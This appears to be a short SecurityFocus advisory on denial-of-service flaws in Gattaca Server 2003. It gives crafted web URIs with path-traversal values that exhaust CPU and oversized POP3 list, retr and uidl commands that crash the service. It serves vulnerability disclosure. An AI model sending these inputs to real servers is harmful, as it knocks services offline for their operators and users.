Gattaca Server 2003 Multiple Denial Of Service Vulnerabilities

No exploit is required.

Examples of URIs that may consume CPU resources:
http://www.example.com/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=http://www.example.com/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

Examples of POP3 commands sufficient to crash the application:
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405


 

Privacy Statement
Copyright 2010, SecurityFocus